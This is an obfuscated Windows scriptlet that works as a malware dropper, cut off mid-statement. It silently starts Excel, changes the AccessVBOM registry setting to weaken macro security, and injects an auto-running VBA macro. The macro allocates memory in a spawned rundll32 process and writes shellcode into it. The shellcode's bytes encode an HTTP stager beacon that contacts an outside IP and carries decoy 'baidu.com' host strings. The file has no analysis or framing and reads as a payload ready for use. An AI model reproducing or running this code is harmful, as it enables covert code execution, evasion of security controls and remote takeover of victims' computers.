<scriptlet>
<registration progid="e00684" classid="{53cb5c98-fa0e-4378-99a4-8743642ed01d}" >
<script language="vbscript">
<![CDATA[
Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule
Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = False
Set WshShell = CreateObject("Wscript.Shell")
function RegExists(regKey)
on error resume next
WshShell.RegRead regKey
RegExists = (Err.number = 0)
end function
' Get the old AccessVBOM value
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & objExcel.Version & "\Excel\Security\AccessVBOM"
if RegExists(RegPath) then
action = WshShell.RegRead(RegPath)
else
action = ""
end if
' Weaken the target
WshShell.RegWrite RegPath, 1, "REG_DWORD"
' Run the macro
Set objWorkbook = objExcel.Workbooks.Add()
Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
xlmodule.CodeModule.AddFromString "Private "&"Type PRO"&"CESS_INF"&"ORMATION"&Chr(10)&" hPro"&"cess As "&"Long"&Chr(10)&" hThr"&"ead As L"&"ong"&Chr(10)&" dwPr"&"ocessId "&"As Long"&Chr(10)&" dwTh"&"readId A"&"s Long"&Chr(10)& _
"End Type"&Chr(10)&Chr(10)&"Private "&"Type STA"&"RTUPINFO"&Chr(10)&" cb A"&"s Long"&Chr(10)&" lpRe"&"served A"&"s String"&Chr(10)&" lpDe"&"sktop As"&" String"&Chr(10)&" lpTi"&"tle As S"&"tring"& _
Chr(10)&" dwX "&"As Long"&Chr(10)&" dwY "&"As Long"&Chr(10)&" dwXS"&"ize As L"&"ong"&Chr(10)&" dwYS"&"ize As L"&"ong"&Chr(10)&" dwXC"&"ountChar"&"s As Lon"&"g"&Chr(10)&" dwYC"&"ountChar"& _
"s As Lon"&"g"&Chr(10)&" dwFi"&"llAttrib"&"ute As L"&"ong"&Chr(10)&" dwFl"&"ags As L"&"ong"&Chr(10)&" wSho"&"wWindow "&"As Integ"&"er"&Chr(10)&" cbRe"&"served2 "&"As Integ"&"er"&Chr(10)&" lpRe"& _
"served2 "&"As Long"&Chr(10)&" hStd"&"Input As"&" Long"&Chr(10)&" hStd"&"Output A"&"s Long"&Chr(10)&" hStd"&"Error As"&" Long"&Chr(10)&"End Type"&Chr(10)&Chr(10)&Chr(35)&"If VBA7 "&"Then"&Chr(10)& _
" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Cre"&"ateStuff"&" Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreateRe"&"moteThre"&"ad"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)& _
" ByVal l"&"pThreadA"&"ttribute"&"s As Lon"&"g"&Chr(44)&" ByVal d"&"wStackSi"&"ze As Lo"&"ng"&Chr(44)&" ByVal l"&"pStartAd"&"dress As"&" LongPtr"&Chr(44)&" lpParam"&"eter As "&"Long"&Chr(44)&" ByVal d"& _
"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpThrea"&"dID As L"&"ong"&Chr(41)&" As Long"&"Ptr"&Chr(10)&" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion All"&"ocStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "& _
Chr(34)&"VirtualA"&"llocEx"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"pAddr As"&" Long"&Chr(44)&" ByVal l"&"Size As "&"Long"&Chr(44)&" ByVal f"&"lAllocat"&"ionType "&"As Long"& _
Chr(44)&" ByVal f"&"lProtect"&" As Long"&Chr(41)&" As Long"&"Ptr"&Chr(10)&" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Wri"&"teStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"WritePro"& _
"cessMemo"&"ry"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"Dest As "&"LongPtr"&Chr(44)&" ByRef S"&"ource As"&" Any"&Chr(44)&" ByVal L"&"ength As"&" Long"&Chr(44)&" ByVal L"& _
"engthWro"&"te As Lo"&"ngPtr"&Chr(41)&" As Long"&"Ptr"&Chr(10)&" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Run"&"Stuff Li"&"b "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreatePr"&"ocessA"&Chr(34)& _
" "&Chr(40)&"ByVal lp"&"Applicat"&"ionName "&"As Strin"&"g"&Chr(44)&" ByVal l"&"pCommand"&"Line As "&"String"&Chr(44)&" lpProce"&"ssAttrib"&"utes As "&"Any"&Chr(44)&" lpThrea"&"dAttribu"&"tes As A"&"ny"& _
Chr(44)&" ByVal b"&"InheritH"&"andles A"&"s Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpEnvir"&"onment A"&"s Any"&Chr(44)&" ByVal l"&"pCurrent"&"Director"&"y As Str"&"ing"&Chr(44)& _
" lpStart"&"upInfo A"&"s STARTU"&"PINFO"&Chr(44)&" lpProce"&"ssInform"&"ation As"&" PROCESS"&"_INFORMA"&"TION"&Chr(41)&" As Long"&Chr(10)&Chr(35)&"Else"&Chr(10)&" Priv"&"ate Decl"&"are Func"&"tion Cre"& _
"ateStuff"&" Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreateRe"&"moteThre"&"ad"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"pThreadA"&"ttribute"&"s As Lon"&"g"&Chr(44)& _
" ByVal d"&"wStackSi"&"ze As Lo"&"ng"&Chr(44)&" ByVal l"&"pStartAd"&"dress As"&" Long"&Chr(44)&" lpParam"&"eter As "&"Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpThrea"&"dID As L"& _
"ong"&Chr(41)&" As Long"&Chr(10)&" Priv"&"ate Decl"&"are Func"&"tion All"&"ocStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"VirtualA"&"llocEx"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"& _
"s Long"&Chr(44)&" ByVal l"&"pAddr As"&" Long"&Chr(44)&" ByVal l"&"Size As "&"Long"&Chr(44)&" ByVal f"&"lAllocat"&"ionType "&"As Long"&Chr(44)&" ByVal f"&"lProtect"&" As Long"&Chr(41)&" As Long"&Chr(10)& _
" Priv"&"ate Decl"&"are Func"&"tion Wri"&"teStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"WritePro"&"cessMemo"&"ry"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"& _
"Dest As "&"Long"&Chr(44)&" ByRef S"&"ource As"&" Any"&Chr(44)&" ByVal L"&"ength As"&" Long"&Chr(44)&" ByVal L"&"engthWro"&"te As Lo"&"ng"&Chr(41)&" As Long"&Chr(10)&" Priv"&"ate Decl"&"are Func"&"tion Run"& _
"Stuff Li"&"b "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreatePr"&"ocessA"&Chr(34)&" "&Chr(40)&"ByVal lp"&"Applicat"&"ionName "&"As Strin"&"g"&Chr(44)&" ByVal l"&"pCommand"&"Line As "&"String"&Chr(44)& _
" lpProce"&"ssAttrib"&"utes As "&"Any"&Chr(44)&" lpThrea"&"dAttribu"&"tes As A"&"ny"&Chr(44)&" ByVal b"&"InheritH"&"andles A"&"s Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpEnvir"& _
"onment A"&"s Any"&Chr(44)&" ByVal l"&"pCurrent"&"Driector"&"y As Str"&"ing"&Chr(44)&" lpStart"&"upInfo A"&"s STARTU"&"PINFO"&Chr(44)&" lpProce"&"ssInform"&"ation As"&" PROCESS"&"_INFORMA"&"TION"&Chr(41)& _
" As Long"&Chr(10)&Chr(35)&"End If"&Chr(10)&Chr(10)&"Sub Auto"&"_Open"&Chr(40)&Chr(41)&Chr(10)&" Dim "&"myByte A"&"s Long"&Chr(44)&" myArray"&" As Vari"&"ant"&Chr(44)&" offset "&"As Long"&Chr(10)&" Dim "& _
"pInfo As"&" PROCESS"&"_INFORMA"&"TION"&Chr(10)&" Dim "&"sInfo As"&" STARTUP"&"INFO"&Chr(10)&" Dim "&"sNull As"&" String"&Chr(10)&" Dim "&"sProc As"&" String"&Chr(10)&Chr(10)&Chr(35)&"If VBA7 "& _
"Then"&Chr(10)&" Dim "&"rwxpage "&"As LongP"&"tr"&Chr(44)&" res As "&"LongPtr"&Chr(10)&Chr(35)&"Else"&Chr(10)&" Dim "&"rwxpage "&"As Long"&Chr(44)&" res As "&"Long"&Chr(10)&Chr(35)&"End If"&Chr(10)& _
" myAr"&"ray "&Chr(61)&" Array"&Chr(40)&Chr(45)&"4"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"119"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"96"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"27"&Chr(44)&"49"& _
Chr(44)&Chr(45)&"46"&Chr(44)&"100"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"48"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"12"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"20"&Chr(44)&Chr(45)&"117"& _
Chr(44)&"114"&Chr(44)&"40"&Chr(44)&"15"&Chr(44)&Chr(45)&"73"&Chr(44)&"74"&Chr(44)&"38"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"49"&Chr(44)&Chr(45)&"64"&Chr(44)&Chr(45)&"84"&Chr(44)&"60"&Chr(44)&"97"& _
Chr(44)&"124"&Chr(44)&"2"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)&Chr(45)&"63"&Chr(44)&Chr(45)&"49"&Chr(44)&" _"&Chr(10)&"13"&Chr(44)&"1"&Chr(44)&Chr(45)&"57"&Chr(44)&Chr(45)&"30"&Chr(44)&Chr(45)&"16"&Chr(44)& _
"82"&Chr(44)&"87"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"16"&Chr(44)&Chr(45)&"117"&Chr(44)&"66"&Chr(44)&"60"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&Chr(45)&"117"&Chr(44)&"64"&Chr(44)&"120"&Chr(44)& _
Chr(45)&"123"&Chr(44)&Chr(45)&"64"&Chr(44)&"116"&Chr(44)&"74"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&"80"&Chr(44)&Chr(45)&"117"&Chr(44)&"72"&Chr(44)&"24"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"32"& _
Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&Chr(45)&"29"&Chr(44)&"60"&Chr(44)&"73"&Chr(44)&Chr(45)&"117"&Chr(44)&"52"&Chr(44)&Chr(45)&"117"&Chr(44)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"42"&Chr(44)&"49"&Chr(44)& _
Chr(45)&"1"&Chr(44)&"49"&Chr(44)&Chr(45)&"64"&Chr(44)&Chr(45)&"84"&Chr(44)&Chr(45)&"63"&Chr(44)&Chr(45)&"49"&Chr(44)&"13"&Chr(44)&"1"&Chr(44)&Chr(45)&"57"&Chr(44)&"56"&Chr(44)&Chr(45)&"32"&Chr(44)&"117"& _
Chr(44)&Chr(45)&"12"&Chr(44)&"3"&Chr(44)&"125"&Chr(44)&Chr(45)&"8"&Chr(44)&"59"&Chr(44)&"125"&Chr(44)&"36"&Chr(44)&"117"&Chr(44)&Chr(45)&"30"&Chr(44)&"88"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"36"& _
Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&"102"&Chr(44)&Chr(45)&"117"&Chr(44)&"12"&Chr(44)&"75"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"28"&Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&Chr(45)&"117"&Chr(44)& _
"4"&Chr(44)&" _"&Chr(10)&Chr(45)&"117"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&Chr(45)&"119"&Chr(44)&"68"&Chr(44)&"36"&Chr(44)&"36"&Chr(44)&"91"&Chr(44)&"91"&Chr(44)&"97"&Chr(44)&"89"&Chr(44)&"90"&Chr(44)& _
"81"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"32"&Chr(44)&"88"&Chr(44)&"95"&Chr(44)&"90"&Chr(44)&Chr(45)&"117"&Chr(44)&"18"&Chr(44)&Chr(45)&"21"&Chr(44)&Chr(45)&"122"&Chr(44)&"93"&Chr(44)&"104"&Chr(44)&"110"& _
Chr(44)&"101"&Chr(44)&"116"&Chr(44)&"0"&Chr(44)&"104"&Chr(44)&"119"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"105"&Chr(44)&"84"&Chr(44)&"104"&Chr(44)&"76"&Chr(44)&"119"&Chr(44)&"38"&Chr(44)&"7"&Chr(44)&Chr(45)& _
"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"43"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"104"&Chr(44)&"58"&Chr(44)&"86"&Chr(44)&"121"&Chr(44)&Chr(45)& _
"89"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"124"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"91"&Chr(44)&"49"&Chr(44)&Chr(45)&"55"&Chr(44)&"81"&Chr(44)&"81"&Chr(44)& _
"106"&Chr(44)&"3"&Chr(44)&"81"&Chr(44)&"81"&Chr(44)&"104"&Chr(44)&"36"&Chr(44)&"5"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"83"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&"87"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"97"& _
Chr(44)&" _"&Chr(10)&Chr(45)&"58"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"21"&Chr(44)&"112"&Chr(44)&"91"&Chr(44)&"49"&Chr(44)&Chr(45)&"46"&Chr(44)&"82"&Chr(44)&"104"&Chr(44)&"0"&Chr(44)& _
"2"&Chr(44)&"96"&Chr(44)&Chr(45)&"124"&Chr(44)&"82"&Chr(44)&"82"&Chr(44)&"82"&Chr(44)&"83"&Chr(44)&"82"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&Chr(45)&"21"&Chr(44)&"85"&Chr(44)&"46"&Chr(44)&"59"&Chr(44)&Chr(45)& _
"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"58"&Chr(44)&Chr(45)&"125"&Chr(44)&Chr(45)&"61"&Chr(44)&"80"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"106"&Chr(44)& _
Chr(45)&"1"&Chr(44)&"83"&Chr(44)&"86"&Chr(44)&" _"&Chr(10)&"104"&Chr(44)&"45"&Chr(44)&"6"&Chr(44)&"24"&Chr(44)&"123"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"64"& _
Chr(44)&"15"&Chr(44)&Chr(45)&"124"&Chr(44)&Chr(45)&"61"&Chr(44)&"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"10"&Chr(44)&"116"&Chr(44)&"4"&Chr(44)& _
Chr(45)&"119"&Chr(44)&Chr(45)&"7"&Chr(44)&Chr(45)&"21"&Chr(44)&"9"&Chr(44)&"104"&Chr(44)&Chr(45)&"86"&Chr(44)&Chr(45)&"59"&Chr(44)&Chr(45)&"30"&Chr(44)&"93"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)& _
Chr(45)&"119"&Chr(44)&Chr(45)&"63"&Chr(44)&"104"&Chr(44)&"69"&Chr(44)&"33"&Chr(44)&"94"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"43"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"& _
Chr(44)&"106"&Chr(44)&"7"&Chr(44)&"81"&Chr(44)&"86"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&Chr(45)&"73"&Chr(44)&"87"&Chr(44)&Chr(45)&"32"&Chr(44)&"11"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)& _
"65"&Chr(44)&"0"&Chr(44)&"47"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"57"&Chr(44)&Chr(45)&"57"&Chr(44)&"116"&Chr(44)&Chr(45)&"73"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"111"&Chr(44)& _
"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"55"&Chr(44)&"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"117"&Chr(44)&Chr(45)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"1"& _
Chr(44)&Chr(45)&"1"&Chr(44)&"47"&Chr(44)&"119"&Chr(44)&"98"&Chr(44)&"78"&Chr(44)&"53"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"& _
Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)& _
"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&" _"&Chr(10)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)& _
"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"& _
Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"& _
Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&" _"&Chr(10)&"105"&Chr(44)&"0"&Chr(44)&"85"&Chr(44)&"115"&Chr(44)&"101"&Chr(44)&"114"&Chr(44)&"45"&Chr(44)&"65"&Chr(44)&"103"&Chr(44)&"101"&Chr(44)& _
"110"&Chr(44)&"116"&Chr(44)&"58"&Chr(44)&"32"&Chr(44)&"77"&Chr(44)&"111"&Chr(44)&"122"&Chr(44)&"105"&Chr(44)&"108"&Chr(44)&"108"&Chr(44)&"97"&Chr(44)&"47"&Chr(44)&"53"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)& _
"32"&Chr(44)&"40"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"112"&Chr(44)&"97"&Chr(44)&"116"&Chr(44)&"105"&Chr(44)&"98"&Chr(44)&"108"&Chr(44)&"101"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"77"&Chr(44)& _
" _"&Chr(10)&"83"&Chr(44)&"73"&Chr(44)&"69"&Chr(44)&"32"&Chr(44)&"49"&Chr(44)&"48"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"87"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"100"&Chr(44)&"111"& _
Chr(44)&"119"&Chr(44)&"115"&Chr(44)&"32"&Chr(44)&"78"&Chr(44)&"84"&Chr(44)&"32"&Chr(44)&"54"&Chr(44)&"46"&Chr(44)&"50"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"87"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"54"&Chr(44)& _
"52"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"120"&Chr(44)&"54"&Chr(44)&"52"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"84"&Chr(44)&"114"&Chr(44)&" _"&Chr(10)&"105"&Chr(44)&"100"&Chr(44)&"101"&Chr(44)&"110"&Chr(44)& _
"116"&Chr(44)&"47"&Chr(44)&"54"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)&"41"&Chr(44)&"13"&Chr(44)&"10"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"& _
Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)& _
"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)& _
"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"& _
Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"& _
Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)& _
"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)& _
"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"& _
Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"& _
Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)& _
"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)& _
"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"& _
Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"& _
Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)& _
"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"0"&Chr(44)&"104"&Chr(44)&Chr(45)&"16"&Chr(44)& _
Chr(45)&"75"&Chr(44)&Chr(45)&"94"&Chr(44)&"86"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&"106"&Chr(44)&"64"&Chr(44)&"104"&Chr(44)&"0"&Chr(44)&"16"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&" _"&Chr(10)&"104"& _
Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"64"&Chr(44)&"0"&Chr(44)&"87"&Chr(44)&"104"&Chr(44)&"88"&Chr(44)&Chr(45)&"92"&Chr(44)&"83"&Chr(44)&Chr(45)&"27"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)& _
"109"&Chr(44)&Chr(45)&"71"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"1"&Chr(44)&Chr(45)&"39"&Chr(44)&"81"&Chr(44)&"83"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"25"&Chr(44)&"87"&Chr(44)&"104"& _
Chr(44)&"0"&Chr(44)&"32"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"83"&Chr(44)&"86"&Chr(44)&"104"&Chr(44)&"18"&Chr(44)&Chr(45)&"106"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"30"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)& _
"43"&Chr(44)&" _"&Chr(10)&Chr(45)&"123"&Chr(44)&Chr(45)&"64"&Chr(44)&"116"&Chr(44)&Chr(45)&"58"&Chr(44)&Chr(45)&"117"&Chr(44)&"7"&Chr(44)&"1"&Chr(44)&Chr(45)&"61"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)& _
"64"&Chr(44)&"117"&Chr(44)&Chr(45)&"27"&Chr(44)&"88"&Chr(44)&Chr(45)&"61"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"87"&Chr(44)&Chr(45)&"3"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"1"&Chr(44)&"49"&Chr(44)&"57"& _
Chr(44)&"50"&Chr(44)&"46"&Chr(44)&"49"&Chr(44)&"54"&Chr(44)&"56"&Chr(44)&"46"&Chr(44)&"49"&Chr(44)&"53"&Chr(44)&"52"&Chr(44)&"46"&Chr(44)&"49"&Chr(44)&"51"&Chr(44)&"49"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)& _
"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(41)&Chr(10)&" If L"&"en"&Chr(40)&"Environ"&Chr(40)&Chr(34)&"ProgramW"&"6432"&Chr(34)&Chr(41)&Chr(41)&" "&Chr(62)&" 0 Then"&Chr(10)&" "&"sProc "&Chr(61)&" Environ"& _
Chr(40)&Chr(34)&"windir"&Chr(34)&Chr(41)&" "&Chr(38)&" "&Chr(34)&Chr(92)&Chr(92)&"SysWOW64"&Chr(92)&Chr(92)&"rundll32"&Chr(46)&"exe"&Chr(34)&Chr(10)&" Else"&Chr(10)&" "&"sProc "&Chr(61)&" Environ"& _
